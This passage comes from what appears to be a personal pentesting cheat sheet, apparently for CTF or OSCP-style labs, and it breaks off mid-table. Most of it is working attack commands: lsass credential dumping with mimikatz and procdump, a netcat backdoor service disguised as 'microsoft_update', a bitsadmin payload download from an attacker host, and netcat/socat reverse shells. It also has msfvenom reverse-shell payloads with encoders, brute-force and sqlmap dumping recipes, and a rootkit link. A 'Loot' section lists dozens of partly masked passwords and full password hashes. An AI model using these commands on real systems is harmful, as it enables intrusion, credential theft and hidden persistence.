plink.exe -P 22 -l root -pw "<password>" -R 445:127.0.0.1:445 <targetip> ``` ### windows useful commands [🡑](#tips) ``` net localgroup Users net localgroup Administrators search dir/s *.doc system("start cmd.exe /k $cmd") sc create microsoft_update binpath="cmd /K start c:\nc.exe -d <targetip> <targetport> -e cmd.exe" start= auto error= ignore /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv <targetip> <targetport> mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full" procdump.exe -accepteula -ma lsass.exe lsass.dmp mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords" C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp ## for 32 bits C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp ## for 64 bits bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerip>/payload.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\payload.exe powershell history: type C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` <a name="tools"></a> ## 💥 Tools [↟](#contents) ### burp [🡑](#tools) ``` set an upstream proxy within burp: burp > user options > upstream proxy > <targetip>:<targetport> ``` ### cewl [🡑](#tools) ``` cewl www.megacorpone.com -m 6 -w /root/newfilelist.txt 2>/dev/null ``` ### fcrackzip [🡑](#tools) ``` fcrackzip -uDp /usr/share/wordlists/rockyou.txt <file.zip> unzip -o -P "password" <file.zip> ``` ### gobuster [🡑](#tools) ``` start with /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt wordlist search file extension: gobuster -u <targetip> -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux -x txt,php gobuster dir -u http://<targetip>:<targetport>/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x "txt,html,php,asp,aspx,jsp" quick: gobuster -u http://<targetip> -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux full/comprehensive: gobuster -s 200,204,301,302,307,403 -u http://<targetip> -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' ippsec: gobuster -u http://<targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,403 -k -x txt,php,asp gobuster -u http://<targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 -k -x sh,pl cgi list: /usr/share/seclists/Discovery/Web-Content/CGIs.txt ``` ### hashcat [🡑](#tools) ``` hashcat -a 0 -m 0 <hash> /usr/share/wordlists/rockyou.txt ``` ### hydra [🡑](#tools) ``` generic: hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> ftp: hydra -t 4 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt <targetip> ftp http: hydra -l admin -P /root/ctf_wordlist.txt kioptrix3.com http-post-form "/admin.php:u=^USER^&p=^PASS^&f=login:'Enter your username and password to continue'" -V with cookie: hydra -l user -P /usr/share/wordlists/rockyou.txt <targetip> -V http-get '/dir/page.php?name=^USER^&pass=^PASS^&submit=Log In:F=Incorrect:H=Cookie: insert stuff here' pop3: hydra -l root -P /usr/share/wordlists/rockyou.txt <targetip> pop3 rdp: hydra -t 4 -V -l root -P /usr/share/wordlists/rockyou.txt rdp://<targetip> smtp: hydra -s 25 -v -V -l root@ucal.local -P /usr/share/wordlists/rockyou.txt -t 1 -w 20 -f <targetip> smtp ssh: hydra -l root -P /usr/share/wordlists/rockyou.txt <targetip> ssh hydra -t 4 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt <targetip> ssh hydra -t 4 -L /usr/share/wordlists/rockyou.txt -p some_passsword <targetip> ssh wordpress: hydra -l elliot -P ./fsocity.dic <targetip> http-post-form "/wp-login.php:log=elliot&pwd=^PASS^:ERROR" ``` ### john [🡑](#tools) ``` create custom wordlist: john --wordlist=megacorpone-cewl --rules --stdout >megacorpone-cewl-jtr crack shadow hashes: unshadow passwd shadow >unshadowed ; john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed ; john --show unshadowed crack md5 hashes: john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hashes ``` ### kernel module [🡑](#tools) ``` rootkit: https://github.com/PinkP4nther/Pinkit ``` ### merlin c2 framework [🡑](#tools) ``` openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=root.kali.pwn" --days 7 GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://<targetip>:<attackerport>" -o merlinagentx64.exe main.go go build -o merlinagent.elf main.go ``` ### metasploit [🡑](#tools) ``` db_status load mimiktaz msfconsole -q msfdb init msfdb start search <string> set payload windows/x86/meterpreter/reverse_tcp set verbose true show advanced show options show payloads show targets systemctl start postgresql systemctl status postgresql wdigest ``` ### msfvenom [🡑](#tools) ``` linux bind tcp shellcode: msfvenom -p linux/x86/shell_bind_tcp lport=4444 -f c -b "\x00\x0a\x0d\x20" --platform linux -a x86 -e x86/shikata_ga_nai windows reverse tcp shellcode: msfvenom -p windows/shell_reverse_tcp lhost=<targetip> lport=<attackerport> -b "\x00\x0a\x0d" -f c -a x86 --platform windows -e x86/shikata_ga_nai revere tcp shellcode for client-side exploit without any encoder: msfvenom -p windows/shell_reverse_tcp lhost=<targetip> lport=<attackerport> -f js_le --platform windows -a x86 -e generic/none php reverse meterpreter: msfvenom -p php/meterpreter/reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f raw -o shell.php php reverse shell: msfvenom -p php/reverse_php LHOST=<targetip> LPORT=80 -f raw -o reverse.php java war reverse shell: msfvenom -p java/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f war -o shell.war windows javascript reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f js_le -e generic/none -n 18 windows powershell reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1 linux reverse tcp shell elf shared object file: msfvenom -p linux/x86/shell_reverse_tcp -f elf-so lhost=<targetip> lport=<attackerport> -o linux-shell-reverse-tcp.so ``` ### netcat [🡑](#tools) ``` bind: nc -lvp <attackerport> connect: nc -nv <targetip> <attackerport> reverse: nc -e /bin/bash <targetip> <attackerport> ``` ### ncrack [🡑](#tools) ``` bruteforce rdp login: ncrack -vv --user administrator -P passwords.txt rdp://<targetip> ``` ### netdiscover [🡑](#tools) ``` netdiscover -r 192.168.92.0/24 ``` ### nikto [🡑](#tools) ``` nikto -h http://<targetip> nikto -C all -h http://IP nikto -h <targetip> -useproxy http://<targetip>:3128 ``` ### nmap [🡑](#tools) ``` vulners nse script: https://github.com/vulnersCom/nmap-vulners searchsploit-like vuln scan: nmap --script vulners --script-args mincvss=5.0 <targetip> ping sweep: nmap -sn -oN scan.ping.nmap <targetiprange> ; cat scan.ping.nmap | grep Up | cut -d" " -f2 quick tcp: nmap -Pn -n -sC -sV -vv -oN scan.tcp.nmap <targetip> quick udp: nmap -Pn -n -sU -sV -vv -oN scan.udp.nmap <targetip> full/intensive tcp: nmap -Pn -n -sC -sV -p- -vv -oN scan.fulltcp.nmap <targetip> full/intensive udp: nmap -Pn -n -sU -sV -p- -vv -oN scan.fulltcp.nmap <targetip> smb bruteforce: nmap --script=smb-brute.nse <targetip> nmap -sV -p 445 --script smb-brute <targetiprange> ``` ### openssl [🡑](#tools) ``` openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=root.kali.pwn" --days 7 ## create a new x509 certificate valid for 7 days openssl req -new -key caca.key -out caca.csr ## create a new certificate signing request (csr) openssl x509 -req -days 365 -in caca.csr -signkey caca.key -out pipi.crt ## generate new certificate openssl pkcs12 -export -in pipi.crt -inkey caca.key -out pipi.p12 ## generate pkcs12 certificate ``` ### searchsploit [🡑](#tools) ``` nmap service scan output -> searchsploit: nmap -p- -sV -oX new.xml <attackerip>; searchsploit --nmap new.xml ``` ### socat [🡑](#tools) ``` socat file:`tty`,raw,echo=0 tcp-listen:<attackerport> socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attackerip>:<attackerport> ``` ### sqlmap [🡑](#tools) ``` avoid prompts, use defaults: sqlmap --batch read http request from a text file (request captured from burp, useful for POST requests) and use it to start scan: sqlmap -r searchform.txt --dbs --batch sqlmap -r searchform.txt -D webapphacking --dump-all --batch post requests: sqlmap -u "http://example.com/" --data "a=1&b=2&c=3" -p "a,b" --method POST intrusive scans: sqlmap --level 5 --risk 3 list databses: sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --dbs list tables within a database: sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery --tables dump a table: sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery -T dev_accounts --dump blind sql enumeration: sqlmap -u "http://<targetip>:<targetport>/index.php" --forms --dbs ``` ### steghide [🡑](#tools) ``` steghide extract -sf file.jpg ``` ### unicornscan [🡑](#tools) ``` scan all 64k ports: unicornscan -vmT <targetip>:a scan first 1k ports: unicornscan -vmT <targetip>:p scan in udp mode: unicornscan -vmU <targetip> ``` ### wfuzz [🡑](#tools) ``` enumerate directories: wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt "http://127.0.0.1/index.php?vuln=../FUZZ/file1.php" wfuzz -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt --sc 200 -t 50 http://<targetip>:<targetport>/FUZZ wfuzz -w common.txt -w /usr/share/seclists/Discovery/Web-Content/web-mutations.txt --sc 200 -t 50 http://<targetip>:4488/FUZZ enumerate directories and filter on response length: wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 158607 http://bart.htb/FUZZ bruteforce password: bruteforce a single list: wfuzz -w pwds.db -d "user=pinkadmin&pass=FUZZ&pin=FUZ2Z" -t 50 --hw 6 http://<targetip>:<targetport>/login.php bruteforce multiple lists: wfuzz -w pwds.db -w pins.txt -d "user=pinkadmin&pass=FUZZ&pin=FUZ2Z" -t 50 --hw 6 http://<targetip>:<targetport>/login.php bruteforce multiple lists, but faster: wfuzz -c -z file,./usernames.txt -z file,./pwds.db -d 'user=FUZZ&pass=FUZ2Z&pin=12345' --hh 45 http://<targetip>:<targetport>/login.php wfuzz -c -z file,./pin.txt -d 'user=pinkadmin&pass=AaPinkSecaAdmin4467&pin=FUZZ' --hh 45,41 http://<targetip>:<targetport>/login.php ``` <a name="loot"></a> ## 🔥 Loot [↟](#contents) <a name="credentials"></a> ### 🔑 Credentials [🡑](#loot) | # | Username | Password | Type | |---|----------|----------|------| | 1. | `notch` | `8YsqfCTnvxAUeduzjN.....` | `ftp` | | 2. | `veronica` | `babygirl_veronica07@yah......` | `ftp` | | 3. | `eric` | `ericdoesntdrinkhiso.....` | `ftp` | | 4. | `Balrog` | `Mell..` | `ftp` | | 5. | `eezeepz` | `keKkeKKeKKeKkE....` | `http` | | 6. | `john` | `MyNameIsJ...` | `liggoat` | | 7. | `robert` | `ADGAdsafdfwt4gadf....` | `liggoat` | | 8. | `dreg` | `Mast..` | `lotuscms` | | 9. | `loneferret` | `starwa..` | `lotuscms` | | 10. | `admin` | `kEjdbRigfBHUREi....` | `mysql` | | 11. | `john` | `thiscannotb...` | `mysql` | | 12. | `wpdbuser` | `meErKa..` | `mysql` | | 13. | `mysql` | `mysql@12...` | `mysql` | | 14. | `admin` | `3298fj8323j80d....` | `mysql` | | 15. | `wordpress` | `Oscp1234..` | `mysql` | | 16. | `john` | `hiroshi..` | `mysql` | | 17. | `root` | `fuckey..` | `mysql` | | 18. | `Admin` | `TogieMYSQL123....` | `mysql` | | 19. | `root` | `darkshad..` | `mysql` | | 20. | `sql_svc` | `M3g4c0rp...` | `sql` | | 21. | `administrator` | `MEGACORP_4dm....` | `ssh` | | 22. | `notch` | `8YsqfCTnvxAUeduzjN.....` | `ssh` | | 23. | `pi` | `raspber..` | `ssh` | | 24. | `fox` | `12345..` | `ssh` | | 25. | `eric` | `triscui..` | `ssh` | | 26. | `anne` | `prince..` | `ssh` | | 27. | `graham` | `GSo7isUM...` | `ssh` | | 28. | `root` | `1234.` | `ssh` | | 29. | `admin` | `thisisalsopw...` | `ssh` | | 30. | `fristigod` | `LetThereBeFri....` | `ssh` | | 31. | `dreg` | `Mast..` | `ssh` | | 32. | `loneferret` | `starwa..` | `ssh` | | 33. | `john` | `MyNameIsJ...` | `ssh` | | 34. | `robert` | `ADGAdsafdfwt4gadf....` | `ssh` | | 35. | `togie` | `1234.` | `ssh` | | 36. | `bob` | `secr..` | `ssh` | | 37. | `susan` | `MySuperS3cretVa....` | `ssh` | | 38. | `insecurity` | `P@ssw0..` | `ssh` | | 39. | `smeagol` | `MyPreciousR...` | `ssh` | | 40. | `Ori` | `span..` | `ssh` | | 41. | `robot` | `abcdefghijklmnopqrstu.....` | `ssh` | | 42. | `mark` | `5AYRft73VtFp....` | `ssh` | | 43. | `wpadmin` | `wpadm..` | `ssh` | | 44. | `root` | `rootpasswo...` | `ssh` | | 45. | `user` | `letme..` | `ssh` | | 46. | `tomcat` | `submitthisforpo....` | `tomcat` | | 47. | | `execrab..` | `truecrypt` | | 48. | `rascal` | `lov.` | `webapp` | | 49. | `user1` | `hell.` | `webapp` | | 50. | `user2` | `comman..` | `webapp` | | 51. | `user3` | `p@ssw0..` | `webapp` | | 52. | `test` | `testte..` | `webapp` | | 53. | `superadmin` | `Uncracka...` | `webapp` | | 54. | `test1` | `testte..` | `webapp` | | 55. | `admin` | `5afac8d8..` | `webapp` | | 56. | `john` | `66lajGGb..` | `webapp` | | 57. | `frodo` | `iwilltakethe....` | `webapp` | | 58. | `smeagol` | `MyPreciousR...` | `webapp` | | 59. | `aragorn` | `AndMySwo..` | `webapp` | | 60. | `legolas` | `AndMyB..` | `webapp` | | 61. | `gimli` | `AndMyA..` | `webapp` | | 62. | `myP14ceAdm1nAcc0uNT` | `manchest..` | `webapp` | | 63. | `tom` | `spongeb..` | `webapp` | | 64. | `mark` | `snowfla..` | `webapp` | | 65. | `john` | `enig..` | `wordpress` | | 66. | `mark` | `helpdesk..` | `wordpress` | | 67. | | `admin:$P$Bx9ohXoCVR5lkKtuQbuWuh2........` | `wordpress` | | 68. | `admin` | `TogieMYSQL123....` | `wordpress` | | 69. | `elliot` | `ER28-06..` | `wordpress` | | 70. | `admin` | `admi.` | `wordpress` | <a name="hashes"></a> ### 🔑 Hashes [🡑](#loot) | # | Hash | |---|------| | 1. | `abatchy:$6$xEq/159Q$ScuKnynbwTBdFA4B9w6OqKxQpWPGpofi59McVuP6T1SADKhNy4n33Ovkk0hwZQkx72XriPSIrc2ubr16OEBBn0:17238:0:99999:7:::` | | 2. | `admin:$6$NPXhvENr$yG4a5RpaLpL5UDRRZ3Ts0eZadZfFFbYpI1kyNJp9rND0AySx2FhYSmAvY.91UzETJVvZcDjWb2pp85uLAli2J/:16757:0:99999:7:::` | | 3. | `Administrator:500:0a70918d669baeb307012642393148ab:34dec8a1db14cdde2a21967c3c997548:::` | | 4. | `Administrator:500:c74761604a24f0dfd0a9ba2c30e462cf:d6908f022af0373e9e21b8a241c86dca:::` | | 5. | `anansi:$6$hblZftkV$vmZoctRs1nmcdQCk5gjlmcLUb18xvJa3efaU6cpw9hoOXC/kHupYqQ2qz5O.ekVE.SwMfvRnf.QcB1lyDGIPE1:15768:0:99999:7:::` | | 6. | `anne:$6$ChsjoKyY$1uHlk7QUSOmdpvSP7Q4PYmE3evwQbUPFp27I4ZdRx/pZp8C8gJAQGu2vy8kwLakYA7cWuZ40aOl2u.8J94U7V.:17595:0:99999:7:::` | | 7. | `arrexel:$1$mDpVXKQV$o6HkBjhl/e.S.bV96tMm6.:17504:0:99999:7:::` | | 8. | `ASPNET:1007:3f71d62ec68a06a39721cb3f54f04a3b:edc0d5506804653f58964a2376bbd769:::` | | 9. | `Balrog:$6$J6kuCfxq$L5ALsHRYfOu0bVV9MbW3.VZOUVEaKSWhfPIq5wXUFV407tpvH8Zx7WdbJeXgdWoPo9LU8eIznf0d44qoFAMn3.:17284:0:99999:7:::` | | 10. | `billy:$6$eqJNxIDh$oO.ynkHZmLxfr0k8YXHHdbyB4boe2two4HnEiJzzuVEUh0w0paEtVCmHXziHhZIet71QcLqhqnV/iknE/pXdS1:17035:0:99999:7:::` | | 11. | `bitnamiftp:$6$saPiFTAH$7K09sg5oIfkIs5kuMx1R/Um4HNd8O6vF2n8oICEom8VVer0BYATY5wtzdPdP3JeuKbZ4RYBml0THNQv8TSc0s/:16751:0:99999:7:::` | | 12. | `bob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::` | | 13. | `brexit:$6$51s7qYVw$XbTfXEV2acHRp9vmA7VTxO35OLK9EGZJzDGF9nYaukD3eppHsn2P1ESMr.9rRn/YYO70uiUskfkWP0LyRtTiT1:18048:0:99999:7:::` | | 14. | `crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::` | | 15. | `doomguy:$6$DWqgg./v$NxqnujIjE8RI.y1u/xiFBPC0K/essEGOfxSF7ovfHG46K6pnetHZNON3sp19rGuoqo26wQkA4B2znRvhqCGQ11:17594:0:99999:7:::` | | 16. | `dreg:$1$qAc2saWZ$Y567sEs.ql3GMttI6pvoe0:15080:0:99999:7:::` | | 17. | `eezeepz:$6$djF4bN.s$JWhT7wJo37fgtuJ.be2Q62PnM/AogXuqGa.PgRzrMGv9/Th0aixBXl8Usy9.RkO1ZRAQ/UM3xP7oGWu9zgEIl.:16756:0:99999:7:::` | | 18. | `eric:$6$b15/PaMU$VKQussKbrXty79HD4A989SVCn.7.u6bJLMvsFgDSgiM01GlyM/lhb1xF0RcX906O6aIMbP7XoVI2F5UzII72i.:17033:0:99999:7:::` | | 19. | `fristigod:$6$0WqnZlI/$gIzMByP7rH21W3neA.uHYZZg5aM7gI1xtOj8WwgoK1QgQh2LWL0nQBJau/mGcOSxLbaGJhJjM.6HNJTWsaetf0:16758:0:99999:7:::` | | 20. | `graham:$6$WF7GkVxM$MOL.cXLpG6UTO0M4exCUFwOEiUhW6bwQa.Frg9CerQbTp.EW4QTzEAuio26Aylv.YP0JPAan10tsUFv6kyvRN0:18010:0:99999:7:::` | | 21. | `Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::` | | 22. | `hackme:$6$.L285vCy$Hma4mKjGV.sE7ZCFVj2iOkRokX1u3F5DMiTPQFoZPJnQ1kUXLje/bY2BIUQFbYu.8M6BvLML5fAftZOCEVnqa1:17981:0:99999:7:::` | | 23. | `harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::` | | 24. | `harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::` | | 25. | `Harry:1008:93c50499355883d1441208923e8628e6:031f5563e0ac4ba538e8ea325479740d:::` | | 26. | `IUSR_GRANPA:1003:a274b4532c9ca5cdf684351fab962e86:6a981cb5e038b2d8b713743a50d89c88:::` | | 27. | `IWAM_GRANPA:1004:95d112c4da2348b599183ac6b1d67840:a97f39734c21b3f6155ded7821d04d16:::` | | 28. | `jens:$6$JWiFWXb8$cGQi07IUqln/uLLVmmrU9VLg7apOH9IlxoyndELCGjLenxfAaVec5Gjaw2DA0QHRwS9hTB5cI2sg/Wk1OFoAh/:18011:0:99999:7:::` | | 29. | `john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::` | | 30. | `john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::` | | 31. | `john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::` | | 32. | `john:$6$aoN7zaDl$e6RsRZndFekSS4bgqz0y5dgzO1dTQsMAWck6dFGogkxrrZf1ZyGbjy/oCpqJniIkasXP05iFZHs.XZVIQqZ2w1:17594:0:99999:7:::` | | 33. | `klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::` | | 34. | `Lakis:1009:f927b0679b3cc0e192410d9b0b40873c:3064b6fc432033870c6730228af7867c:::` | | 35. | `loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::` | | 36. | `loneferret:$1$qbkHf53U$r.kK/JgDLDcXGRC6xUfB11:15079:0:99999:7:::` | | 37. | `mai:$6$Mp.mBBi7$BCAKb75xSAy8PM6IhjdSOIlcmHvA9V4KnEDSTZAN2QdMUwCwGiwZtwGPXalF15xT097Q6zaXrY6nD/7RsdSiE0:17594:0:99999:7:::` | | 38. | `makis:$1$Yp7BAV10$7yHWur1KMMwK5b8KRZ2yK.:17239:0:99999:7:::` | | 39. | `mark:$6$//1vISW6$9pl2v8Jg0mNE7E2mgTQlTwZ1zcaepnDyYE4lIPJDdX7ipnxm/muPD7DraEm3z0jqDe5iH/Em2i6YXJpQD.5pl0:18010:0:99999:7:::` | | 40. | `mark:$6$J3gYK/cQ$au1WmOCtq.X1DTKt1CEmKA9qr4PfwZuAGUdCfAV.SSU5VxAtjW/Xk1/oWJtQVaoXMEVXmeBIB6bq24JpcSRjF0:17408:0:99999:7:::` | | 41. | `mysql:$6$O2ymBAYF$NZDtY392guzYrveKnoISea6oQpv87OpEjEef5KkEUqvtOAjZ2i1UPbkrfmrHG/IonKdnYEec0S0ZBcQFZ.sno/:18053:0:99999:7:::` | | 42. | `notch:$6$RdxVAN/.$DFugS5p/G9hTNY9htDWVGKte9n9r/nYYL.wVdAHfiHpnyN9dNftf5Nt.DkjrUs0PlYNcYZWhh0Vhl/5tl8WBG1:17349:0:99999:7:::` | | 43. | `noulis:$6$ApsLg5.I$Zd9blHPGRHAQOab94HKuQFtJ8m7ob8MFnX6WIIr0Aah6pW/aZ.yA3T1iU13lCSixrh6NG1.GHPl.QbjHSZmg7/:17247:0:99999:7:::` | | 44. | `Ori:$6$1zYgjEIM$VQ0gvU7JjenS9WuiVjSeva8pbWnEXjqTmEdFnQRXKmTmXPXmt55/oyup40NiXD8J9GxmXF7DYiaHZDRshrs3f1:17237:0:99999:7:::` | | 45. | `oscp:$6$k8OEgwaFdUqpVETQ$sKlBojI3IYunw8wEDAyoFdHgVtOPzkDPqksql7IWzpfZXpd3UqP569BokTZ52mDroq/rmJY9zgfeQVmBFu/Sf.:18452:0:99999:7:::` | | 46. | `peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::` | | 47. | `pi:$6$SQPHFoql$gSE5qWbZRGHDin4LnFY56sMnQsmvH/o2oIlXv.3KcqVsJCYgJ09R9/Pws88e8yjKgJnaxN3zdq8f5ots1bJcY/:17148:0:99999:7:::` | | 48. | `postgres:$1$dwLrUikz$LRJRShCPfPyYb3r6pinyM.:17239:0:99999:7:::` | | 49. | `puck:$6$A/mZxJX0$Zmgb3T6SAq.FxO1gEmbIcBF9Oi7q2eAi0TMMqOhg0pjdgDjBr0p2NBpIRqs4OIEZB4op6ueK888lhO7gc.27g1:15768:0:99999:7:::` | | 50. | `reynard:$6$h54J.qxd$yL5md3J4dONwNl.36iA.mkcabQqRMmeZ0VFKxIVpXeNpfK.mvmYpYsx8W0Xq02zH8bqo2K.mkQzz55U2H5kUh1:15768:0:99999:7:::` | | 51. | `robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::` | | 52. | `robot:$6$HmQCDKcM$mcINMrQFa0Qm7XaUaS5xLEBSeP3bUkr18iwgwTAL8AIfUDYBWG5L8J9.Ukb3gVWUQoYam4G0m.I5qaHBnTddK/:16752:0:99999:7:::` | | 53. | `root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::` | | 54. | `root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh` | | 55. | `root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::` | | 56. | `root:$1$p/d3CvVJ$4HDjev4SJFo7VMwL2Zg6P0:17239:0:99999:7:::` | | 57. | `root:$1$QAKvVJey$6rRkAMGKq1u62yfDaenUr1:15082:0:99999:7:::` | | 58. | `root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::` | | 59. | `root:$6$.wvqHr9ixq/hDW8t$a/dHKimULfr5rJTDlS7uoUanuJB2YUUkh.LWSKF7kTNp4aL8UTlOk2wT8IkAgJ.vDF/ThSIOegsuclEgm9QfT1:18452:0:99999:7:::` | | 60. | `root:$6$9xQC1KOf$5cmONytt0VF/wi3Np3jZGRSVzpGj6sXxVHkyJLjV4edlBxTVmW91pcGwAViViSWcAS/.OF0iuvylU5IznY2Re.:16753:0:99999:7:::` | | 61. | `root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::` | | 62. | `root:$6$BVgS5ne0$Q6rV3guK7QQUy7uRMwbQ3vv2Y5I9yQUhIzvrIhuiDso/o5UfDxZw7MMq8atR3UdJjhpkFVxVD0cVtjXQdPUAH.:17431:0:99999:7:::` | | 63. | `root:$6$CM3c1cdI$HbQWZlQdGEWV8yo3j7M84i1/RFK4G7fafTUIUYLWk52zm9O8KRLhqZenF8KbqsUjHlZQk4VmNEeEbBCRjOWbH0:17111:0:99999:7:::` | | 64. | `root:$6$cQPCchYp$rWjOEHF47iuaGk/DQdkG6Dhhfm3.hTaNZPO4MoyBz2.bn44fERcQ23XCsp43LOt5NReEUjwDF8WDa5i1ML2jH.:16695:0:99999:7:::` | | 65. | `root:$6$GpmQGQUN$8kLewzMF4ItmxezcryWqSPrXNRTH5TOQFKKkHjK2NSmrTg95xiYi.l8L.RYUL.8pAsj8s4EGvDy4dvENQIqNf.:15585:0:99999:7:::` | | 66. | `root:$6$kdMFceEg$pk9h93tdD7IomhE7L0Y396HO6fxSM.XDh9dgeBhKpdZlM/WYxCZe7yPRNHfZ5FvNRuILVp2NOsqNmgjoSx/IN0:18012:0:99999:7:::` | | 67. | `root:$6$L2m6DJwN$p/xas4tCNp19sda4q2ZzGC82Ix7GiEb7xvCbzWCsFHs/eR82G4/YOnni/.L69tpCkOGo5lm0AU7zh9lP5fL6A0:17247:0:99999:7:::` | | 68. | `root:$6$m20VT7lw$172.XYFP3mb9Fbp/IgxPQJJKDgdOhg34jZD5sxVMIx3dKq.DBwv.mw3HgCmRd0QcN4TCzaUtmx4C5DvZaDioh0:15768:0:99999:7:::` | | 69. | `root:$6$mqjgcFoM$X/qNpZR6gXPAxdgDjFpaD1yPIqUF5l5ZDANRTKyvcHQwSqSxX5lA7n22kjEkQhSP6Uq7cPaYfzPSmgATM9cwD1:18050:0:99999:7:::` | | 70. | `root:$6$n.BA4A59$WeIF0ZbaB3VGgAxUZqGHnw01.GhL9oVYYFioh07RpPtBl49YdMahhtbYhxUjanXf/NJXiCHBvrNhdC53P1UX2.:17412:0:99999:7:::` | | 71. | `root:$6$O4bZf1Ju$0xcLPNyQkVcKT0CajZYBOTz4thlujMRjQ7XuFstUDWwYHKmVmJsDmzGXUwYbU1uqr6jxEvX4XJjSUgiwjPmEp0:17399:0:99999:7:::` | | 72. | `root:$6$P7ElNgGp$fNzyy4OgqSR1ANJXTgbpzp4U42JXG1qJ55iNV10NVJoX5UWjtckWD0oHmcTOj0lqObyWhFu2y3udHVpHaqYxf.:17238:0:99999:7:::` | | 73. | `root:$6$PnbVvEMS$OcseJT8lZRrgrW1JBpHJ252SPRxS6Rkh3oVBkrbRBZgHBD1wArL6FcyO5daqaon7waFKwSqbg5fIjFgzUVFMS1:18048:0:99999:7:::` | | 74. | `root:$6$qAoeosiW$fsOy8H/VKux.9K0T3Ww2D3FPNlO5LAaFytx/6t69Q7LPDSS/nNiP4xzq0Qab.Iz3uy5fYdH3Aw/K5v3ZMhRRH0:16756:0:99999:7:::` | | 75. | `root:$6$sZyJlUny$OcHP9bd8dO9rAKAlryxUjnUbH0dxgZc2uCePZMUUKSeIdALUulXLQ1iDjoEQpvZI.HTHOHUkCR.m39Xrt3mm91:17097:0:99999:7:::` | | 76. | `sarah:$6$DoSO7Ycr$2GtM5.8Lfx9Sw8X1fDMF.7zWDoVoy1892nyp0iFsqh5CfmtEROtxmejvQxu0N/8D7X8PQAGKYGl.gUb6/cG210:18010:0:99999:7:::` | | 77. | `scriptmanager:$6$WahhM57B$rOHkWDRQpds96uWXkRCzA6b5L3wOorpe4uwn5U32yKRsMWDwKAm.RF6T81Ki/MOyo.dJ0B8Xm5/wOrLk35Nqd0:17504:0:99999:7:::` | | 78. | `service:$1$cwdqim5m$bw71JTFHNWLjDTmYTNN9j/:17239:0:99999:7:::` | | 79. | 